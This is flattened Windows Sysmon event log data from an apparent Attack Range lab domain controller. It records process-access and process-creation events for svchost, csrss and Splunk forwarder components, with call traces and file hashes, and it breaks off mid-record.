13:19:17.794{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005116Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:17.794{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005115Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:17.794{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005114Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:17.794{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005113Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:17.794{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005112Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:17.794{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005111Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:17.794{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005110Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:17.794{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005109Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:17.794{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005108Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:17.794{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-44D5-6000-2301-000000009A01}2232C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005107Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:17.794{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-44D5-6000-2301-000000009A01}2232C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005106Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:17.794{08A6967A-44D5-6000-2301-000000009A01}2232C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005133Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:18.606{08A6967A-44D6-6000-2401-000000009A01}32884708C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005132Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:18.466{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-44D6-6000-2401-000000009A01}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005131Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:18.466{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005130Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:18.466{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005129Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:18.466{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005128Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:18.466{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005127Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:18.466{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005126Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:18.466{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005125Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:18.466{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005124Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:18.466{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005123Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:18.466{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005122Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:18.466{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-44D6-6000-2401-000000009A01}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005121Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:18.466{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-44D6-6000-2401-000000009A01}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005120Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:18.466{08A6967A-44D6-6000-2401-000000009A01}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005147Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:19.200{08A6967A-44D7-6000-2501-000000009A01}47442820C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005146Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 